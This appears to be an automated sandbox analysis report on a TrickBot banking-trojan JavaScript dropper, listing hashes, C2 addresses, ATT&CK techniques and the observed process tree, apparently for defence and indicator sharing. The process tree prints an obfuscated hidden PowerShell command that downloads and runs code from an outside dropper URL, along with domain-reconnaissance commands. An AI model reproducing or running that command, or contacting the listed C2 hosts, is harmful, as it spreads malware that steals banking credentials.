trickbot | 8dfc65192c00aa6d2c13bb997e364ca99af41be3c7a281b5b47a1207d61f0886

General

Target

details_5613.js
Size

629KB
MD5

13ecfbc54efb87498df12bbb02d054ef
SHA1

c857c59ef9fae1eaf4c3d1f8389586b2bc8ea8c6
SHA256

c91bd39590ae41161fc8d4ae9a453f689512ab90a0cc405d00dc9a50db05ea33
SHA512

5993d9c9343c041162f779196fc7a5fea688c1d922d940ca7adf62e4deb683a6104b4299d89f4c5ab05fc1384e7aeeb4e229ce8aed503baa73982c1b8176992d

Score

10^/10

trickbot rob112 banker spyware stealer suricata trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://netvalleykenya.com/crm.php

Extracted

Family

trickbot

Version

100018

Botnet

rob112

C2

38.110.103.124:443

185.56.76.28:443

204.138.26.60:443

60.51.47.65:443

74.85.157.139:443

68.69.26.182:443

38.110.103.136:443

38.110.103.18:443

138.34.28.219:443

185.56.76.94:443

217.115.240.248:443

24.162.214.166:443

80.15.2.105:443

154.58.23.192:443

38.110.100.104:443

45.36.99.184:443

185.56.76.108:443

185.56.76.72:443

138.34.28.35:443

97.83.40.67:443

Attributes

autorun
Name:pwgrabb
Name:pwgrabc

ecc_pubkey.base64

Signatures

Trickbot
Developed in 2016, TrickBot is one of the more recent banking Trojans.
trojan banker trickbot
suricata: ET MALWARE Trickbot Checkin Response
suricata
Blocklisted process makes network request 6 IoCs

Processes:

powershell.execmd.execmd.exe

flow pid process

9 3556 powershell.exe
14 3556 powershell.exe
64 3828 cmd.exe
65 3828 cmd.exe
66 3828 cmd.exe
68 4024 cmd.exe
Downloads MZ/PE file
Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

3952 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Discovers systems in the same network 1 TTPs 2 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exenet.exe

pid process

3616 net.exe
1708 net.exe
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

ipconfig.exe

pid process

3888 ipconfig.exe
Runs net.exe

flow	pid	process
9	3556	powershell.exe
14	3556	powershell.exe
64	3828	cmd.exe
65	3828	cmd.exe
66	3828	cmd.exe
68	4024	cmd.exe

pid	process
3952	rundll32.exe

pid	process
3616	net.exe
1708	net.exe

pid	process
3888	ipconfig.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

Processes:

powershell.execmd.execmd.execmd.exe

pid	process
3556	powershell.exe
3556	powershell.exe
3556	powershell.exe
3828	cmd.exe
3828	cmd.exe
2512	cmd.exe
2512	cmd.exe
4024	cmd.exe
4024	cmd.exe
2512	cmd.exe
2512	cmd.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exewermgr.execmd.execmd.exe

description	pid	process
Token: SeDebugPrivilege	3556	powershell.exe
Token: SeDebugPrivilege	1216	wermgr.exe
Token: SeDebugPrivilege	3828	cmd.exe
Token: SeDebugPrivilege	2512	cmd.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

wscript.execmd.exepowershell.exerundll32.exerundll32.exewermgr.exe

description	pid	process	target process
PID 1096 wrote to memory of 2476	1096	wscript.exe	cmd.exe
PID 1096 wrote to memory of 2476	1096	wscript.exe	cmd.exe
PID 2476 wrote to memory of 3556	2476	cmd.exe	powershell.exe
PID 2476 wrote to memory of 3556	2476	cmd.exe	powershell.exe
PID 3556 wrote to memory of 3276	3556	powershell.exe	rundll32.exe
PID 3556 wrote to memory of 3276	3556	powershell.exe	rundll32.exe
PID 3276 wrote to memory of 3952	3276	rundll32.exe	rundll32.exe
PID 3276 wrote to memory of 3952	3276	rundll32.exe	rundll32.exe
PID 3276 wrote to memory of 3952	3276	rundll32.exe	rundll32.exe
PID 3952 wrote to memory of 3448	3952	rundll32.exe	cmd.exe
PID 3952 wrote to memory of 3448	3952	rundll32.exe	cmd.exe
PID 3952 wrote to memory of 3448	3952	rundll32.exe	cmd.exe
PID 3952 wrote to memory of 1216	3952	rundll32.exe	wermgr.exe
PID 3952 wrote to memory of 1216	3952	rundll32.exe	wermgr.exe
PID 3952 wrote to memory of 1216	3952	rundll32.exe	wermgr.exe
PID 3952 wrote to memory of 1216	3952	rundll32.exe	wermgr.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe
PID 1216 wrote to memory of 3828	1216	wermgr.exe	cmd.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\details_5613.js
1⤵
- Suspicious use of WriteProcessMemory
PID:1096

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbgBlAHQAdgBhAGwAbABlAHkAawBlAG4AeQBhAC4AYwBvAG0ALwBjAHIAbQAuAHAAaABwACIAKQA=
2⤵
- Suspicious use of WriteProcessMemory
PID:2476

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbgBlAHQAdgBhAGwAbABlAHkAawBlAG4AeQBhAC4AYwBvAG0ALwBjAHIAbQAuAHAAaABwACIAKQA=
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3556

C:\Windows\System32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\ELjPKDZnfBipIXd.bin,StartW
4⤵
- Suspicious use of WriteProcessMemory
PID:3276

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\ELjPKDZnfBipIXd.bin,StartW
5⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3952

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe
6⤵
PID:3448

C:\Windows\system32\wermgr.exe
C:\Windows\system32\wermgr.exe
6⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1216

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe
7⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2512

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe
7⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:4024

C:\Windows\system32\cmd.exe
/c ipconfig /all
8⤵
PID:2260

C:\Windows\system32\ipconfig.exe
ipconfig /all
9⤵
- Gathers network information
PID:3888

C:\Windows\system32\cmd.exe
/c net config workstation
8⤵
PID:1808

C:\Windows\system32\net.exe
net config workstation
9⤵
PID:196

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 config workstation
10⤵
PID:1840

C:\Windows\system32\cmd.exe
/c net view /all
8⤵
PID:3760

C:\Windows\system32\net.exe
net view /all
9⤵
- Discovers systems in the same network
PID:3616

C:\Windows\system32\cmd.exe
/c net view /all /domain
8⤵
PID:1196

C:\Windows\system32\net.exe
net view /all /domain
9⤵
- Discovers systems in the same network
PID:1708

C:\Windows\system32\cmd.exe
/c nltest /domain_trusts
8⤵
PID:2060

C:\Windows\system32\nltest.exe
nltest /domain_trusts
9⤵
PID:2920

C:\Windows\system32\cmd.exe
/c nltest /domain_trusts /all_trusts
8⤵
PID:580

C:\Windows\system32\nltest.exe
nltest /domain_trusts /all_trusts
9⤵
PID:2616

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

1

T1059

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

1

T1081

Discovery

System Information Discovery

2

T1082

Remote System Discovery

1

T1018

Lateral Movement

Collection

Data from Local System

1

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\ELjPKDZnfBipIXd.bin
MD5
8dd7c961c9cdbd69e9a5d86d7809fc50

SHA1
f9765d2e54784151519b6d755118edd01e55c51d

SHA256
6e057855e21f4c93a4e3825b9711ca07ccec94fed55dbc20e1d3316b2b3dc549

SHA512
9cf38f34bf574839f7404918f4fc8503bfd0a52d22e505972ebabc098e4854b661e42bb0f391bb293735494739f74d565b9256a35079c8dfb11fba3dfdcd6cfa

Download Submit
\Users\Admin\AppData\Local\Temp\ELjPKDZnfBipIXd.bin
MD5
8dd7c961c9cdbd69e9a5d86d7809fc50

SHA1
f9765d2e54784151519b6d755118edd01e55c51d

SHA256
6e057855e21f4c93a4e3825b9711ca07ccec94fed55dbc20e1d3316b2b3dc549

SHA512
9cf38f34bf574839f7404918f4fc8503bfd0a52d22e505972ebabc098e4854b661e42bb0f391bb293735494739f74d565b9256a35079c8dfb11fba3dfdcd6cfa

Download Submit
memory/196-173-0x0000000000000000-mapping.dmp

Download
memory/580-181-0x0000000000000000-mapping.dmp

Download
memory/1196-177-0x0000000000000000-mapping.dmp

Download
memory/1216-154-0x0000024B41200000-0x0000024B41201000-memory.dmp

Filesize
4KB

Download
memory/1216-152-0x0000000000000000-mapping.dmp

Download
memory/1216-153-0x0000024B410E0000-0x0000024B41108000-memory.dmp

Filesize
160KB

Download
memory/1708-178-0x0000000000000000-mapping.dmp

Download
memory/1808-172-0x0000000000000000-mapping.dmp

Download
memory/1840-174-0x0000000000000000-mapping.dmp

Download
memory/2060-179-0x0000000000000000-mapping.dmp

Download
memory/2260-170-0x0000000000000000-mapping.dmp

Download
memory/2476-114-0x0000000000000000-mapping.dmp

Download
memory/2512-162-0x0000000000000000-mapping.dmp

Download
memory/2616-182-0x0000000000000000-mapping.dmp

Download
memory/2920-180-0x0000000000000000-mapping.dmp

Download
memory/3276-136-0x0000000000000000-mapping.dmp

Download
memory/3556-135-0x000001DB89616000-0x000001DB89618000-memory.dmp

Filesize
8KB

Download
memory/3556-130-0x000001DBA3C00000-0x000001DBA3C01000-memory.dmp

Filesize
4KB

Download
memory/3556-123-0x000001DB895D0000-0x000001DB895D1000-memory.dmp

Filesize
4KB

Download
memory/3556-119-0x000001DB89610000-0x000001DB89612000-memory.dmp

Filesize
8KB

Download
memory/3556-121-0x000001DB89613000-0x000001DB89615000-memory.dmp

Filesize
8KB

Download
memory/3556-115-0x0000000000000000-mapping.dmp

Download
memory/3616-176-0x0000000000000000-mapping.dmp

Download
memory/3760-175-0x0000000000000000-mapping.dmp

Download
memory/3828-157-0x0000000000000000-mapping.dmp

Download
memory/3828-161-0x000002886A140000-0x000002886A141000-memory.dmp

Filesize
4KB

Download
memory/3888-171-0x0000000000000000-mapping.dmp

Download
memory/3952-151-0x0000000004791000-0x0000000004793000-memory.dmp

Filesize
8KB

Download
memory/3952-150-0x0000000004850000-0x0000000004851000-memory.dmp

Filesize
4KB

Download
memory/3952-148-0x0000000000F20000-0x0000000000F58000-memory.dmp

Filesize
224KB

Download
memory/3952-149-0x00000000047F0000-0x0000000004834000-memory.dmp

Filesize
272KB

Download
memory/3952-146-0x00000000047B0000-0x00000000047E7000-memory.dmp

Filesize
220KB

Download
memory/3952-144-0x0000000004750000-0x0000000004789000-memory.dmp

Filesize
228KB

Download
memory/3952-141-0x0000000004710000-0x000000000474B000-memory.dmp

Filesize
236KB

Download
memory/3952-139-0x0000000000000000-mapping.dmp

Download
memory/4024-167-0x0000000180000000-0x0000000180009000-memory.dmp

Filesize
36KB

Download
memory/4024-166-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads